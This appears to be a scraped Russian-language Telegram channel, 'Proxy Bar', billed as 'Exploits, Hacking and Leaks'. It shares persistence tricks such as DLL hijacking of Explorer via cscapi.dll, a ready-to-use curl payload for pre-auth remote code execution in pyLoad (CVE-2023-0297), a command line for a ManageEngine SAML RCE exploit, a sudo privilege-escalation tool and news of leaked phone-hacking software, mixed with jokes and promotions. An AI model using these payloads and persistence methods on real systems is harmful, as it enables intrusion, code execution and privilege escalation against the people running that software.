Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
охх))) RecycleBin снова в деле ! )

RecyclePersist
👍8😱4
Сжато, ёмко, всеобъемлюще, БАЗА !!!))))
Для этих гребаных web-мастеров - motherfuckingwebsite.com
Этому не научат на курсах
Что то даже БаШорг вспомнился версии 2004 года....

#humor #web #lol
👍19😱1
ExplorerPersist
перехват загрузки cscapi.dll и как итог - внедрение "нашей" dll с "нашим" функционалом.
Ну а Persistence в том что отрабатывает каждый раз при запуске проводника
download
👍6🔥1
next generation Firewall - а главное, надежный 😜
🔥27👍7
Cellebrite & MSAB
Данные от Cellebrite и MSAB, двух компаний, которые предоставляют правительствам инструменты для взлома телефонов, были слиты.
*
Утечка включает в себя фактическое программное обеспечение, а также документацию.
*
Эти инструменты использовались против журналистов, активистов и диссидентов по всему миру.
😱6👍3🔥1
👍5😱2🔥1
ChatGPT - для RedTeam и BlueTeam

Годная статья с хорошими примерами

Читать OpenAI ChatGPT for Cyber Security

Если нет учетки OpenAI - попробовать свои силы можно в нашем боте

#openAI
👍27😱6🔥1
Windows Kernel Elevation of Privilege Vulnerability.
CVE-2022-21881
cve-2022-21881-io_completion-poc.cpp
🔥4😱1
CVE-2023-0297
Pre-auth RCE in pyLoad
read
Exploit Code:
curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://<target>/flash/addcrypted2'
🔥5
Proxy Bar
ChatGPT - для RedTeam и BlueTeam Годная статья с хорошими примерами Читать OpenAI ChatGPT for Cyber Security Если нет учетки OpenAI - попробовать свои силы можно в нашем боте #openAI
ОТСТАВИТЬ ПАНИКУ
БОТ был и останется бесплатным.
Сейчас тестируются новые фичи. К вечеру все будет доступно в одном из двух вариантов:
1. Допуск по телеграмм id для всех желающих
или
2. Допуск как и раньше, но с таймаутом сообщений в 30 сек
3. симбиоз первого и второго варианта
👍23😱5
CVE-2022-46463
Проблема контроля доступа в Harbour v1.X.X–v2.5.3 позволяет злоумышленникам получать доступ к общедоступным и частным репозиториям без аутентификации.

Вообще Харбор крутая штука, для devops\devsecops

exploit

#harbor #repo
👍4😱2
NGINXConfig
Самый простой способ настроить производительный, безопасный и стабильный NGINX сервер.
Ну вдруг вам нужно, натыкали галочек, получили конфиг.
НаТыкать

#nginx
🔥20👍8
CVE-2023-22809 - опять Sudo, опять bypass😏

#Unix #linux #sudo #bypass
😱3
CVE-2022-47966
*
Список ПО от ManageEngine подверженных атаке поражает !
*
Уязвимость позволяет удаленное выполнение кода, отправив HTTP-запрос POST, содержащий вредоносный ответ SAML. А всё из за не патченной версии Apache Santuario для проверки подписи XML.
*
read
*
POC/exploit
*
Usage:
python3 CVE-2022-47966.py --url https://10.0.40.64:8080/SamlResponseServlet --command notepad.exe
👍2🔥1
Чаты и каналы Telegram по информационной безопасности 2023
Хорошая подборочка over 100, но нас в ней нет ((
Забираем
😱16
SUDO KILLER
Тулза для выявления и использования неправильных конфигураций и уязвимостей правил sudo для повышения привилегий Linux.

download
👍10😱5